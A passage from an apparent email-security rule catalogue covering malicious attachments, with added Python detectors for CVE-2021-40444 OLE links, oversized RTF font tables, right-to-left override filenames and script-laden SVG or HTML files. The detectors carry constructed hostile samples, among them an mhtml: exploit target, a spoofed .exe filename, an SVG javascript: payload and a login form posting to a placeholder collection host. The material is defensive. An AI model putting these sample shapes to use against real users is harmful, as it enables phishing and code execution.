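    """Every oleObject relationship, in any .rels part, whose target is resolved externally."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                rtype = rel.get("Type", "").rstrip("/")
                if rel.get("TargetMode") == "External" and rtype.endswith("/oleObject"):
                    hits.append({"part": name, "id": rel.get("Id"), "target": rel.get("Target")})
    return hits


def looks_like_cve_2021_40444(package: bytes) -> bool:
    """External OLE relationship with an mhtml: target, the pattern reported for CVE-2021-40444."""
    return any((h["target"] or "").lower().startswith("mhtml:")
               for h in external_ole_relationships(package))


if __name__ == "__main__":
    sample = build_sample_docx(
        "mhtml:http://example.invalid/side.html!x-usc:http://example.invalid/side.html", external=True)
    print(external_ole_relationships(sample))
    print("CVE-2021-40444 shape:", looks_like_cve_2021_40444(sample))
```

A legitimate embedded object points at a part inside the package (for example embeddings/oleObject1.bin) with no TargetMode, so requiring TargetMode="External" keeps ordinary documents out of the hit list.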
  • Attachment: CVE-2023-21716 - Microsoft Office Remote Code Execution Vulnerability

    Jan 12, 2026

    Attachment contains an RTF file with a font table defining an excessive number of fonts, used to exploit CVE-2023-21716.

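
A structural check matching the description above (an RTF font table with an excessive number of fonts), as an added example and not the rule's own code. It isolates the {\fonttbl ...} group with brace matching, counts \fN font definitions, and flags a count above a threshold. The threshold is an assumption chosen far above what legitimate documents carry, and the RTF samples are generated inline.

```python
import re

FONTTBL_START = re.compile(rb"\{\\fonttbl\b", re.IGNORECASE)
FONT_DEF = re.compile(rb"\\f(\d+)")  # \f0, \f1, ... but not \fnil, \fcharset, \fs


def fonttbl_group(rtf: bytes) -> bytes:
    r"""Return the {\fonttbl ...} group, brace-matched so nested {\fN ...} entries stay inside."""
    m = FONTTBL_START.search(rtf)
    if not m:
        return b""
    depth, i = 0, m.start()
    while i < len(rtf):
        c = rtf[i:i + 1]
        if c == b"\\":           # skip the control/escaped character after a backslash
            i += 2
            continue
        if c == b"{":
            depth += 1
        elif c == b"}":
            depth -= 1
            if depth == 0:
                return rtf[m.start():i + 1]
        i += 1
    return rtf[m.start():]      # unterminated group: take the rest of the file


def count_fonts(rtf: bytes) -> int:
    return len(FONT_DEF.findall(fonttbl_group(rtf)))


def font_table_is_excessive(rtf: bytes, threshold: int = 1000) -> bool:
    """Assumed threshold: real documents define a few dozen fonts at most."""
    return count_fonts(rtf) > threshold


def build_rtf(n_fonts: int) -> bytes:
    """Constructed RTF whose font table holds n_fonts entries."""
    fonts = b"".join(b"{\\f%d\\fnil\\fcharset0 Font%d;}" % (i, i) for i in range(n_fonts))
    return b"{\\rtf1\\ansi{\\fonttbl" + fonts + b"}\\f0 Hello\\par}"


if __name__ == "__main__":
    for n in (3, 1500):
        sample = build_rtf(n)
        print(n, count_fonts(sample), font_table_is_excessive(sample))
```

Counting only inside the font table matters: \f0 also appears in the body as a font selector, and a naive file-wide count would inflate on long documents.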
  • Attachment: DocuSign impersonation via PDF linking to new domain

    Jan 12, 2026

    This rule detects PDF files containing a DocuSign logo that link to a newly created domain (registered 3 days ago or less).

  • Attachment: Embedded Javascript in SVG file

    Jan 12, 2026

    JavaScript inside SVG files can be used to smuggle malicious payloads or execute scripts.

  • Attachment: Embedded VBScript in MHT file (unsolicited)

    Jan 12, 2026

    MHT files can be used to run VBScript, which can run malicious code.

  • Attachment: EML containing a base64 encoded script

    Jan 12, 2026

    Attached EML contains a base64 encoded script in the message body.

  • Attachment: EML file contains HTML attachment with login portal indicators

    Jan 12, 2026

    Attached EML file contains an HTML attachment with suspicious login indicators. This is a known credential theft technique.

  • Attachment: EML with Encrypted ZIP

    Jan 12, 2026 · Attack surface reduction

    Detects when an EML file is attached that contains an encrypted ZIP file. The encryption can be used to bypass security scanning and deliver malicious content.

  • Attachment: EML with suspicious indicators

    Jan 12, 2026

    Attached EML contains suspicious indicators, such as a missing sender email or short HTML body.

  • Attachment: Encrypted Microsoft Office file (unsolicited)

    Jan 12, 2026 · Attack surface reduction

    Encrypted OLE2 (e.g. Microsoft Office) attachment from an unsolicited sender. Attachment encryption is a common technique used to bypass malware scanning products. Use this rule if receiving encrypted attachments is not normal behavior in your environment.

  • Attachment: Excel file with suspicious template identifier

    Jan 12, 2026

    Detects Excel attachments containing a specific template identifier (TM16390866) in the EXIF metadata, which may indicate malicious or suspicious document templates being used to distribute harmful content.

  • Attachment: Fake secure message and suspicious indicators

    Jan 12, 2026

    Body contains language resembling credential theft, and an attached "secure message" from an untrusted sender.

  • Attachment: File execution via Javascript

    Jan 12, 2026 · Attack surface reduction

    JavaScript contains identifiers or strings that may attempt to execute files.

  • Attachment: Filename containing Unicode right-to-left override character

    Jan 12, 2026

    Recursively identifies attachments that attempt to conceal their true file extension by using right-to-left override characters.

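
A checker for the right-to-left override rule above and for the earlier "calendar file with invisible Unicode characters" rule, as an added example that is not part of either rule. One helper flags bidi controls and zero-width characters; the filename check additionally reconstructs what a naive renderer displays after U+202E so the true and the shown extension can be compared, and the .ics check reports hits per property. The invisible-character set is an assumption, the .ics parsing is line-based (RFC 5545 line folding is ignored), and the samples are constructed.

```python
import unicodedata

RTLO = "\u202e"
# Bidi controls, zero-width characters and similar format characters that never
# belong in a filename or an .ics property value. Assumed set for this example.
INVISIBLE = {
    "\u200b", "\u200c", "\u200d", "\u2060", "\ufeff", "\u00ad",
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
    "\u2066", "\u2067", "\u2068", "\u2069",
}


def find_invisible(text: str) -> list[tuple[int, str]]:
    """(offset, 'U+XXXX NAME') for every invisible or format (Cf) character in text."""
    hits = []
    for i, ch in enumerate(text):
        if ch in INVISIBLE or unicodedata.category(ch) == "Cf":
            hits.append((i, f"U+{ord(ch):04X} {unicodedata.name(ch, '?')}"))
    return hits


def displayed_name(filename: str) -> str:
    """Approximate a naive renderer: everything after U+202E is drawn reversed."""
    if RTLO not in filename:
        return filename
    head, _, tail = filename.partition(RTLO)
    return head + tail[::-1]


def _ext(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def check_filename(filename: str) -> dict:
    true_ext = _ext(filename)
    shown_ext = _ext(displayed_name(filename))
    return {
        "rtlo": RTLO in filename,
        "true_ext": true_ext,
        "shown_ext": shown_ext,
        "extension_spoofed": RTLO in filename and true_ext != shown_ext,
        "invisible": find_invisible(filename),
    }


def check_ics(ics: str) -> dict:
    """Invisible characters per .ics property value (line-based; no unfolding)."""
    flagged = {}
    for line in ics.splitlines():
        if ":" not in line:
            continue
        prop, _, value = line.partition(":")
        hits = find_invisible(value)
        if hits:
            flagged[prop] = hits
    return flagged


if __name__ == "__main__":
    # Constructed: a filename that the OS saves as .exe but a naive view shows as .pdf
    print(check_filename("invoice_" + RTLO + "fdp.exe"))
    sample_ics = ("BEGIN:VCALENDAR\r\nSUMMARY:Meeting\u200b invite\r\n"
                  "DESCRIPTION:Click\u2060here\r\nEND:VCALENDAR\r\n")
    print(check_ics(sample_ics))
```

The spoof test compares extensions rather than merely looking for U+202E because a bare override in, say, a legitimately bidirectional filename is a weaker signal than an extension that reads differently from what the operating system will execute.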
  • Attachment: HTML attachment with login portal indicators

    Jan 12, 2026

    Recursively scans files and archives to detect indicators of login portals implemented in HTML files. This is a known credential theft technique used by threat actors.

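
Content-level triage for the HTML and SVG attachment rules on this page (login portal indicators, embedded JavaScript in SVG, and an HTML file that is nothing but script), as an added example and not the rules' own logic. The SVG check walks the XML for script elements, on* event handlers and javascript: hrefs; the HTML check counts password fields and form actions and compares visible text against script content. The indicator choices are assumptions and the sample files are constructed on a reserved domain.

```python
import re
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

EVENT_ATTR = re.compile(r"on[a-z]+")

# Constructed SVG with all three indicators.
SAMPLE_SVG = (
    b"<svg xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'>"
    b"<a xlink:href='javascript:alert(document.domain)'>"
    b"<rect onclick='fetch(&quot;http://example.invalid/c&quot;)' width='10' height='10'/></a>"
    b"<script>window.location = 'http://example.invalid/login';</script>"
    b"</svg>"
)
# Constructed HTML login page and a constructed script-only HTML file.
SAMPLE_LOGIN_HTML = """<html><body>
<form action="http://example.invalid/collect.php" method="post">
<input type="email" name="u"><input type="password" name="p">
<button>Sign in</button></form></body></html>"""
SAMPLE_SCRIPT_ONLY_HTML = (
    '<html><body><script>document.write(atob("PGgxPmhpPC9oMT4="))</script></body></html>'
)


def svg_script_indicators(svg: bytes) -> list[str]:
    """<script> elements, on* event handlers and javascript: hrefs anywhere in an SVG."""
    hits = []
    for el in ET.fromstring(svg).iter():
        tag = el.tag.rsplit("}", 1)[-1].lower()
        if tag == "script":
            hits.append("script element")
        for attr, val in el.attrib.items():
            name = attr.rsplit("}", 1)[-1].lower()   # strip xlink: and other namespaces
            if EVENT_ATTR.fullmatch(name):
                hits.append(f"event handler {name} on <{tag}>")
            elif name == "href" and val.strip().lower().startswith("javascript:"):
                hits.append(f"javascript: href on <{tag}>")
    return hits


class _LoginScan(HTMLParser):
    """Counts password fields, form actions, and visible text versus script content."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []
        self.script_chars = 0
        self.text_chars = 0
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_chars += len(data)
        else:
            self.text_chars += len(data.strip())


def html_indicators(html: str) -> dict:
    p = _LoginScan()
    p.feed(html)
    p.close()
    return {
        "password_inputs": p.password_inputs,
        "form_actions": p.form_actions,
        "login_portal": p.password_inputs > 0,
        "script_only": p.script_chars > 0 and p.text_chars == 0,  # nothing but JavaScript
    }


if __name__ == "__main__":
    print(svg_script_indicators(SAMPLE_SVG))
    print(html_indicators(SAMPLE_LOGIN_HTML))
    print(html_indicators(SAMPLE_SCRIPT_ONLY_HTML))
```

The script-only signal is deliberately "script present and no visible text" rather than "contains script": an HTML attachment whose entire page is rebuilt client-side from a decoded blob is the HTML-smuggling shape, whereas a page with script and real content is ordinary.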
  • Attachment: HTML file contains exclusively Javascript

    Jan 12, 2026

    Attached HTML file does not contain any HTML other than a